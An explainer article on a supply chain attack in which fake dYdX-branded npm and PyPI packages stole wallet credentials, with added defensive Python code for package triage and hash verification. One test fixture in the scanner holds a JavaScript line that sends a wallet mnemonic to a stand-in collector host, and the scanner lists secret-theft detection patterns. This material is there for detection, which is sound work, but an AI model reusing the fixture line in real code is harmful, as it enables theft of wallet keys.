TL;DR

  • A crypto supply chain attack used malicious software packages posing as dYdX tooling to drain user wallets, without exploiting the protocol or its smart contracts.
  • Attackers targeted off-chain tooling and dependencies, showing how wallet losses increasingly stem from compromised software rather than on-chain flaws.

Malicious software packages posing as tools linked to dYdX, a decentralized platform for perpetual crypto trading, were recently used to drain user wallets without exploiting any vulnerability in the protocol itself. The incident reflects a broader pattern: supply chain attacks are increasingly responsible for user losses across the crypto industry.

Rather than targeting smart contracts, attackers compromised the tools used to access them. This shift has made off-chain crypto attacks a primary risk vector, even as on-chain security improves.

What actually happened

Attackers published malicious npm and PyPI packages, presenting them as legitimate tools connected to dYdX. They hosted the packages on the public package registries (npm for JavaScript, PyPI for Python) from which developers routinely pull prebuilt components by name, usually with no more scrutiny than a marketplace listing gets.

Once installed, the software acted as wallet-draining malware. It quietly collected wallet credentials and enabled unauthorized transfers, often without triggering any visible errors or alerts. Any wallet whose key material was handled by a process that had loaded the packages had to be treated as exposed, which in practice means moving funds to freshly generated keys rather than trying to clean the affected machine.

The packages were eventually removed from the registries, but anyone who installed them before the removal was already at risk. Removal does not uninstall copies already on developer machines, in build caches, or referenced from lockfiles, so those still have to be found and purged.
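The behaviour described above (install-time execution, credential collection, quiet exfiltration) is what a triage pass over an installed dependency tree should look for. The following is an added example written for this article; it is not code from dYdX, from npm, or from the incident. All package names, manifests and sources in it are constructed, and "dydx-client" is a stand-in for whatever package a project actually trusts, not a real package name.

```python
"""Heuristic triage of installed npm packages for wallet-draining behaviour.

Added example for this article; not code from dYdX, npm, or the incident
described. Package names, manifests and sources are constructed, and the
pattern lists are starting points rather than a complete signature set.
"""
import json
import re
from pathlib import Path

# Lifecycle hooks npm runs automatically during `npm install`, so malicious
# code placed in them executes before the developer ever imports the module.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicators that code reaches for wallet secrets (matched case-insensitively).
SECRET_PATTERNS = [
    r"mnemonic", r"seed\s*phrase", r"private[_\s]?key", r"keystore",
    r"process\.env\.\w*(KEY|SEED|MNEMONIC)",
]
# Indicators that code can send data off the machine.
EGRESS_PATTERNS = [r"\bfetch\(", r"https?\.request\(", r"axios\.(post|get)\(", r"https?://"]


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to spot names squatting on a trusted package."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def triage_package(name, manifest, sources, trusted):
    """Score one package; returns {"name", "findings", "suspicious"}."""
    findings, score = [], 0
    hooks = [h for h in INSTALL_HOOKS if h in manifest.get("scripts", {})]
    if hooks:
        findings.append(f"runs install hooks {hooks}")
        score += 1
    code = "\n".join(sources)
    reads_secrets = any(re.search(p, code, re.I) for p in SECRET_PATTERNS)
    has_egress = any(re.search(p, code) for p in EGRESS_PATTERNS)
    if reads_secrets and has_egress:
        findings.append("reads wallet secrets and has network egress")
        score += 2
    elif reads_secrets:
        findings.append("reads wallet secrets")
        score += 1
    for t in trusted:
        if name != t and levenshtein(name, t) <= 2:
            findings.append(f"name is within edit distance 2 of trusted '{t}'")
            score += 2
    return {"name": name, "findings": findings, "suspicious": score >= 2}


def scan_node_modules(root, trusted):
    """Apply triage_package to every package.json under a real node_modules tree."""
    flagged = []
    for manifest_path in Path(root).rglob("package.json"):
        try:
            manifest = json.loads(manifest_path.read_text(errors="ignore"))
        except ValueError:
            continue
        pkg_dir = manifest_path.parent
        sources = [p.read_text(errors="ignore") for p in pkg_dir.rglob("*.js")]
        result = triage_package(manifest.get("name", pkg_dir.name), manifest, sources, trusted)
        if result["suspicious"]:
            flagged.append(result)
    return flagged


# Constructed sample input. "dydx-client" is a hypothetical trusted name.
TRUSTED = ["dydx-client"]
SAMPLES = [
    ("dydx-client-helpers",
     {"name": "dydx-client-helpers", "scripts": {"postinstall": "node setup.js"}},
     ['const m = process.env.WALLET_MNEMONIC || "";\n'
      'fetch("https://collector.example/upload", {method: "POST", body: m});']),
    ("dydx-cleint",  # typosquat of the trusted name, otherwise benign
     {"name": "dydx-cleint"},
     ["module.exports = require('dydx-client');"]),
    ("tiny-trim",
     {"name": "tiny-trim", "scripts": {"test": "node test.js"}},
     ["module.exports = (s) => s.trim();"]),
]


def demo():
    """Triage the constructed samples; keyed by package name."""
    return {name: triage_package(name, manifest, sources, TRUSTED)
            for name, manifest, sources in SAMPLES}


if __name__ == "__main__":
    for r in demo().values():
        print(r)
```

Run it against a real tree with `scan_node_modules("node_modules", TRUSTED)`; the pattern matching is deliberately crude, so treat a hit as a prompt to read the package, not as proof of compromise, and treat a clean result as no evidence either way.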

This wasn’t a protocol failure

The incident illustrates the difference between on-chain and off-chain crypto attacks. The dYdX protocol continued to operate normally, and the attack did not involve any smart contract vulnerability.

Instead, the compromise occurred entirely in the surrounding software layer. Off-chain crypto attacks exploit trust in developer tools and dependencies, areas that protocol audits do not cover. Protocol security alone is therefore no longer sufficient to prevent user losses.

The shift from on-chain exploits to off-chain attacks

As smart contract security has improved, direct on-chain exploits have become more expensive and less reliable. Attackers have therefore moved to softer targets outside the protocol boundary: the wallets, SDKs and build tooling that sit off-chain.

Dependency poisoning and fake tooling allow attackers to bypass hardened contracts and reach private keys directly, without engaging with blockchain defenses at all. A transfer signed with a stolen key is indistinguishable on-chain from one the owner authorized, so no contract-level control can stop it.

Why crypto is especially vulnerable to supply-chain attacks

Crypto's software supply chain depends heavily on open-source packages and rapid iteration. Dependencies are often pulled from public registries by name alone, without hash pinning, signature checks, or review of the scripts a package runs at install time.

These conditions make developer dependency attacks particularly effective because a single compromised package can expose private keys and trigger immediate losses.

Understanding how these crypto supply chain attacks work starts with recognizing that the most fragile components often sit outside the blockchain itself.

What this means for users and developers

The incident underscores how wallet security in crypto now extends beyond phishing scams or flawed smart contracts. Increasingly, what puts funds at risk is whether the third-party software a user relies on can actually be trusted.

For developers, dependency attacks turn routine choices into risk decisions. Pulling a package, accepting an update, or skipping verification can now carry direct financial consequences.
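The "limited verification" and "skipping verification" points above both come down to one mechanic: installing whatever the registry serves for a name, rather than the exact bytes that were reviewed. Both pip (`--hash=sha256:<hex>` entries in requirements.txt) and npm (the `integrity` field in package-lock.json, an SRI string such as `sha512-<base64>`) already support pinning artifacts by hash. The following is an added example for this article, not code from the page's subject, pip, or npm; the tarball bytes, package name and pin files are constructed so it runs offline.

```python
"""Verify downloaded dependency artifacts against pinned hashes before install.

Added example for this article, not code from the page's subject, pip or npm.
The artifact bytes, the package name "dydx-tool" and the pin files are
constructed for illustration.
"""
import base64
import hashlib
import re

REQ_LINE = re.compile(r"^(?P<name>[A-Za-z0-9_.-]+)==(?P<ver>[^\s\\]+)(?P<rest>.*)$")
HASH_OPT = re.compile(r"--hash=(?P<alg>sha256|sha384|sha512):(?P<hex>[0-9a-fA-F]+)")


def parse_requirements(text: str) -> dict:
    """Return {name: (version, {(alg, hexdigest), ...})}; reject anything unpinned."""
    pins = {}
    logical = text.replace("\\\n", " ")  # join pip-style backslash continuations
    for line in logical.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        m = REQ_LINE.match(line)
        if not m:
            raise ValueError(f"unpinned or malformed requirement: {line!r}")
        hashes = {(h.group("alg"), h.group("hex").lower())
                  for h in HASH_OPT.finditer(m.group("rest"))}
        pins[m.group("name").lower()] = (m.group("ver"), hashes)
    return pins


def rejects_unpinned(text: str) -> bool:
    """True if parse_requirements refuses the given requirements text."""
    try:
        parse_requirements(text)
    except ValueError:
        return True
    return False


def verify_pip_artifact(name: str, data: bytes, pins: dict) -> bool:
    """True only if the artifact matches a pinned hash for `name`.

    A missing pin, or a pin with no hashes, is treated as a failure rather
    than as permission to skip verification.
    """
    entry = pins.get(name.lower())
    if entry is None or not entry[1]:
        return False
    return any(hashlib.new(alg, data).hexdigest() == hexdigest
               for alg, hexdigest in entry[1])


def verify_npm_integrity(data: bytes, integrity: str) -> bool:
    """Check an SRI string ('sha512-<base64>', space-separated if several).

    Simplification: any matching digest passes; the SRI spec says only the
    strongest listed algorithm should count.
    """
    for token in integrity.split():
        alg, _, b64 = token.partition("-")
        if alg in ("sha256", "sha384", "sha512") and \
                hashlib.new(alg, data).digest() == base64.b64decode(b64):
            return True
    return False


# Constructed artifacts: the reviewed tarball and a tampered re-upload.
GOOD_TARBALL = b"constructed tarball bytes for dydx-tool 1.0.0\n"
TAMPERED_TARBALL = GOOD_TARBALL + b"// appended: reads keystore, posts it elsewhere\n"

# Constructed pin files generated from the reviewed bytes.
GOOD_SHA256 = hashlib.sha256(GOOD_TARBALL).hexdigest()
REQUIREMENTS = (
    "# constructed requirements.txt with hash pinning\n"
    "dydx-tool==1.0.0 \\\n"
    f"    --hash=sha256:{GOOD_SHA256}\n"
)
LOCK_INTEGRITY = "sha512-" + base64.b64encode(hashlib.sha512(GOOD_TARBALL).digest()).decode()


def demo() -> dict:
    """Exercise the happy path, a tampered artifact, and an unpinned name."""
    pins = parse_requirements(REQUIREMENTS)
    return {
        "good_pip": verify_pip_artifact("DYDX-Tool", GOOD_TARBALL, pins),
        "tampered_pip": verify_pip_artifact("dydx-tool", TAMPERED_TARBALL, pins),
        "unpinned_pip": verify_pip_artifact("other-lib", GOOD_TARBALL, pins),
        "good_npm": verify_npm_integrity(GOOD_TARBALL, LOCK_INTEGRITY),
        "tampered_npm": verify_npm_integrity(TAMPERED_TARBALL, LOCK_INTEGRITY),
        "unpinned_requirements_rejected": rejects_unpinned("requests\n"),
    }


if __name__ == "__main__":
    print(demo())
```

The useful property is the failure mode: an update the registry serves under the same name but with different bytes fails the check instead of installing silently, and a name that was never pinned is refused rather than trusted by default. `pip install --require-hashes -r requirements.txt` and `npm ci` against a committed lockfile enforce the same thing in the real tools; the example exists to make the check visible.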

Conclusion

The dYdX-related package incident helps explain why wallets get drained without smart contract hacks, even when protocols operate as intended. The losses did not stem from a failure of blockchain design, but from assumptions made outside it.

Seen in that light, a supply chain attack is less an anomaly than a byproduct of how crypto software is built and distributed today. As protocol security matures, attackers increasingly exploit the trust placed in tooling, dependencies, and update paths sitting off-chain.
